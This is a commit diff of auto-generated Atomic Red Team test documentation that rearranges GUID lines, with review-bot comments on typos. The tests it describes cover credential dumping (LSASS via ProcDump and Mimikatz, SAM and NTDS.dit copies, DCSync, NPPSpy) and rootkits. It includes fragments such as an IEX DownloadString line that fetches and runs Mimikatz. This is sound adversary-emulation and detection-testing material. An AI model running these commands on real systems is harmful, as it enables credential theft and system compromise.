Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

CircleCI Atomic Red Team doc generator
2021-06-24 17:04:33 +00:00
parent 390bcd3796
commit 36d49de4c8
223 changed files with 3625 additions and 2175 deletions
+60 -36
@@ -54,9 +54,6 @@ The following SSPs can be used to access credentials:
<br/>
## Atomic Test #1 - Windows Credential Editor
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
@@ -64,9 +61,14 @@ Upon successful execution, you should see a file with user passwords/hashes at %
If you see no output it is likely that execution was blocked by Anti-Virus.
If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first.
**Supported Platforms:** Windows
**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
#### Inputs:
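Review bot: the failure-mode line in this hunk still carries literal backslash-escaped quotes (`\"wce.exe is not recognized as an internal or external command\"`), which render as backslashes in the generated markdown. This file is produced by the doc generator, so the fix belongs in the test's source YAML (drop the escaping or use a literal block scalar) rather than here; the same leak shows up in several other descriptions in this commit.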
@@ -117,18 +119,20 @@ if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
<br/>
## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump
auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
#### Inputs:
@@ -174,15 +178,17 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
<br/>
## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll
auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
@@ -206,18 +212,20 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
<br/>
## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking
auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
#### Inputs:
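Review bot: the output path `C:\\windows\\temp\\dumpert.dmp` and the quoted message on the following line carry doubled backslashes and escaped quotes that will render literally; the other tests in this file write paths such as `c:\windows\temp\lsass_dump.dmp` with single backslashes, so the Dumpert description in the source YAML should be normalized to match.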
@@ -260,14 +268,16 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
#### Run it with these steps!
@@ -292,14 +302,16 @@ Manager and administrative permissions.
<br/>
## Atomic Test #6 - Offline Credential Theft With Mimikatz
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
**Supported Platforms:** Windows
**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
#### Inputs:
@@ -358,17 +370,19 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
<br/>
## Atomic Test #7 - LSASS read with pypykatz
auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
**Supported Platforms:** Windows
**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
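Review bot: `useranames` is misspelled in the success-criteria line, and `get_prereq_command's` uses an underscore and apostrophe where the other tests in this file refer to `get-prereq_commands`; both should be corrected in the test's YAML, since this markdown is regenerated on every run.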
@@ -421,15 +435,17 @@ pip install pypykatz
<br/>
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
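Review bot: the documented output location `$env:SYSTEMROOT\System32\lsass_*.dmp` does not match the cleanup command visible in the next hunk header, `Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore`; one of the two is wrong, and if the dump really lands under System32 the cleanup leaves it behind. Reconcile the description and the cleanup path in the source YAML.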
@@ -454,18 +470,20 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
<br/>
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
#### Inputs:
@@ -510,16 +528,18 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
<br/>
## Atomic Test #10 - Powershell Mimikatz
auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
**Supported Platforms:** Windows
**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
#### Inputs:
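Review bot: `privleges` is misspelled in the failure-mode line, and `\"access denied\"` carries escaped quotes that will render literally; both belong in a fix to the test YAML.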
@@ -544,14 +564,16 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
<br/>
## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
This test uses the technique describe in this tweet
(https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
**Supported Platforms:** Windows
**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
#### Inputs:
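Review bot: `the technique describe in this tweet` should read `described`, and the description ends without a period; fix in the source YAML.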
@@ -597,17 +619,19 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
<br/>
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
#### Inputs:
+20 -12
@@ -36,16 +36,18 @@ Notes:
<br/>
## Atomic Test #1 - Registry dump of SAM, creds, and secrets
auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
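Review bot: `Then processed locally using https://github.com/Neohapsis/creddump7` is a sentence fragment, and `three files named, sam, system and security` has a misplaced comma; suggest `... can be enumerated via three registry keys and then processed locally using ...` and `three files named sam, system and security` in the source YAML.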
@@ -73,13 +75,15 @@ del %temp%\security >nul 2> nul
<br/>
## Atomic Test #2 - Registry parse with pypykatz
auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows
**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
@@ -132,14 +136,16 @@ pip install pypykatz
<br/>
## Atomic Test #3 - esentutl.exe SAM copy
auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480
Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** Windows
**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
#### Inputs:
@@ -170,13 +176,15 @@ del #{copy_dest}\#{file_name} >nul 2>&1
<br/>
## Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
Executes a hashdump by reading the hasshes from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
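Review bot: `hasshes` is misspelled in the PowerDump description; fix in the source YAML.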
+30 -18
@@ -30,15 +30,17 @@ The following tools and techniques can be used to enumerate the NTDS file and th
<br/>
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin
auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
#### Inputs:
@@ -75,9 +77,6 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
<br/>
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy
auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -85,9 +84,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
#### Inputs:
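Review bot: the description states the domain controller requirement twice (`This test is intended to be run on a domain Controller.` and `This test must be executed on a Windows Domain Controller.`) with inconsistent capitalization of `Domain Controller`; collapse to one sentence in the source YAML. The lowercase `domain Controller` wording recurs in the other tests of this file.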
@@ -151,9 +155,6 @@ mkdir #{extract_path}
<br/>
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil
auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@@ -161,9 +162,14 @@ uses the "IFM" or "Install From Media" backup functionality that allows Active D
subsequent domain controllers without the need of network-based replication.
Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
#### Inputs:
@@ -205,15 +211,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
<br/>
## Atomic Test #4 - Create Volume Shadow Copy with WMI
auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
#### Inputs:
@@ -250,15 +258,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
<br/>
## Atomic Test #5 - Create Volume Shadow Copy with Powershell
auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
#### Inputs:
@@ -283,15 +293,17 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
<br/>
## Atomic Test #6 - Create Symlink to Volume Shadow Copy
auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
#### Inputs:
+5 -3
@@ -12,16 +12,18 @@
<br/>
## Atomic Test #1 - Dumping LSA Secrets
auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f
Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
**Supported Platforms:** Windows
**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
#### Inputs:
+5 -3
@@ -14,16 +14,18 @@ DCSync functionality has been included in the "lsadump" module in [Mimikatz](htt
<br/>
## Atomic Test #1 - DCSync
auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
**Supported Platforms:** Windows
**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
#### Inputs:
+10 -6
@@ -14,14 +14,16 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin
<br/>
## Atomic Test #1 - Dump individual process memory with sh (Local)
auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
#### Inputs:
@@ -73,14 +75,16 @@ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_pa
<br/>
## Atomic Test #2 - Dump individual process memory with Python (Local)
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
#### Inputs:
+10 -6
@@ -15,13 +15,15 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
<br/>
## Atomic Test #1 - Access /etc/shadow (Local)
auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235
/etc/shadow file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
#### Inputs:
@@ -51,13 +53,15 @@ rm -f #{output_file}
<br/>
## Atomic Test #2 - Access /etc/passwd (Local)
auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
/etc/passwd file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
#### Inputs:
+10 -6
@@ -15,9 +15,6 @@ Several of the tools mentioned in associated sub-techniques may be used by both
<br/>
## Atomic Test #1 - Gsecdump
auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's following by two 32 characters hashes.
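Review bot: `domain\username's following by two 32 characters hashes` should read `domain\username followed by two 32-character hashes`; fix in the source YAML.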
@@ -26,9 +23,14 @@ If you see output that says "compat: error: failed to create child process", exe
You will receive only error output if you do not run this test from an elevated context (run as administrator)
If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
**Supported Platforms:** Windows
**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
#### Inputs:
@@ -72,16 +74,18 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
<br/>
## Atomic Test #2 - Credential Dumping with NPPSpy
auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
**Supported Platforms:** Windows
**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
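Review bot: `After user's logging in cleartext password is saved in C:\NPPSpy.txt.` is ungrammatical; suggest `After a user logs in, the cleartext password is saved in C:\NPPSpy.txt.` in the source YAML.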
+5 -3
@@ -12,9 +12,6 @@ Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Cit
<br/>
## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)
auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
On success, a hex dump of the first 11 bytes of the volume is displayed.
@@ -24,9 +21,14 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti
00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS
```
**Supported Platforms:** Windows
**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
#### Inputs:
+10 -6
@@ -12,15 +12,17 @@
<br/>
## Atomic Test #1 - System Service Discovery
auto_generated_guid: 89676ba1-b1f8-47ee-b940-2e1a113ebc71
Identify system services.
Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71
@@ -42,15 +44,17 @@ sc query state= all
<br/>
## Atomic Test #2 - System Service Discovery - net.exe
auto_generated_guid: 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s
**Supported Platforms:** Windows
**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
#### Inputs:
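Review bot: the expected output path `c:\Windows\Temp\service-list.txt.s` has a stray trailing `s`; check it against the path the test command actually writes and correct the YAML.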
+5 -3
@@ -10,15 +10,17 @@
<br/>
## Atomic Test #1 - List Process Main Windows - C# .NET
auto_generated_guid: fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
Compiles and executes C# code to list main window titles associated with each process.
Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
#### Inputs:
+5 -3
@@ -12,9 +12,6 @@ The Registry contains a significant amount of information about the operating sy
<br/>
## Atomic Test #1 - Query Registry
auto_generated_guid: 8f7578c4-9863-4d83-875c-a565573bbdf0
Query Windows Registry.
Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).
References:
@@ -22,9 +19,14 @@ https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-se
https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
**Supported Platforms:** Windows
**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0
+15 -9
@@ -16,13 +16,15 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve
<br/>
## Atomic Test #1 - Loadable Kernel Module based Rootkit
auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553
Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553
#### Inputs:
@@ -70,13 +72,15 @@ mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
<br/>
## Atomic Test #2 - Loadable Kernel Module based Rootkit
auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f
Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f
#### Inputs:
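Review bot: Atomic Test #1 and Atomic Test #2 share the identical title `Loadable Kernel Module based Rootkit` and the identical one-line description, so the generated doc gives readers no way to tell them apart; the surrounding hunk headers show they run different commands (`mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}` versus `sudo depmod -a`), so the YAML descriptions should say how the two variants differ and be written as full sentences.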
@@ -127,9 +131,6 @@ sudo depmod -a
<br/>
## Atomic Test #3 - Windows Signed Driver Rootkit Test
auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
This test exploits a signed driver to execute code in Kernel.
This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys.
The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html
@@ -139,9 +140,14 @@ https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.htm
The hash of our PoC Exploit is
SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
This will simulate hiding a process.
**Supported Platforms:** Windows
**auto_generated_guid:** 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
#### Inputs:
+40 -24
@@ -26,15 +26,17 @@ Adversaries may use the information from [System Network Configuration Discovery
<br/>
## Atomic Test #1 - System Network Configuration Discovery on Windows
auto_generated_guid: 970ab6a1-0157-4f3f-9a73-ec4166754b23
Identify network configuration information
Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23
@@ -58,15 +60,17 @@ net config
<br/>
## Atomic Test #2 - List Windows Firewall Rules
auto_generated_guid: 038263cb-00f4-4b0a-98ae-0696c67e1752
Enumerates Windows Firewall Rules using netsh.
Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752
@@ -86,15 +90,17 @@ netsh advfirewall firewall show rule name=all
<br/>
## Atomic Test #3 - System Network Configuration Discovery
auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17
Identify network configuration information.
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17
@@ -117,15 +123,17 @@ if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep
<br/>
## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)
auto_generated_guid: dafaf052-5508-402d-bf77-51e0700c02e2
Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2
@@ -148,16 +156,18 @@ nltest /domain_trusts
<br/>
## Atomic Test #5 - List Open Egress Ports
auto_generated_guid: 4b467538-f102-491d-ace7-ed487b853bf5
This is to test for what ports are open outbound. The technique used was taken from the following blog:
https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/
Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt.
**Supported Platforms:** Windows
**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5
#### Inputs:
@@ -226,14 +236,16 @@ Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
<br/>
## Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects
auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee
#### Inputs:
@@ -270,13 +282,15 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #7 - Qakbot Recon
auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b
A list of commands known to be performed by Qakbot for recon purposes
**Supported Platforms:** Windows
**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b
#### Inputs:
@@ -301,17 +315,19 @@ A list of commands known to be performed by Qakbot for recon purposes
<br/>
## Atomic Test #8 - List macOS Firewall Rules
auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88
"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows.
Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user.
Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
**Supported Platforms:** macOS
**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88
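Review bot: the macOS firewall description opens with a stray `"` and contains escaped `\"Is it on or off?\"`, both of which render literally; the `socketfilterfw` flags `--getglobalstate` and `--listapps` are also not set in backticks like the `defaults` arguments above them. Fix the quoting in the source YAML.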
+55 -33
@@ -32,15 +32,17 @@ Specific to macOS, the <code>bonjour</code> protocol exists to discover addition
<br/>
## Atomic Test #1 - Remote System Discovery - net
auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd
Identify remote systems with net.exe.
Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.
**Supported Platforms:** Windows
**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd
@@ -61,15 +63,17 @@ net view
<br/>
## Atomic Test #2 - Remote System Discovery - net group Domain Computers
auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f
Identify remote systems with net.exe querying the Active Directory Domain Computers group.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f
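Review bot: `cmd.exe will execute cmd.exe against Active Directory` should say `net.exe`, per the test title and the `net group "Domain Computers" /domain` command shown in the next hunk header; fix in the source YAML.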
@@ -89,15 +93,17 @@ net group "Domain Computers" /domain
<br/>
## Atomic Test #3 - Remote System Discovery - nltest
auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
Identify domain controllers for specified domain.
Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
#### Inputs:
@@ -122,15 +128,17 @@ nltest.exe /dclist:#{target_domain}
<br/>
## Atomic Test #4 - Remote System Discovery - ping sweep
auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592
Identify remote systems via ping sweep.
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592
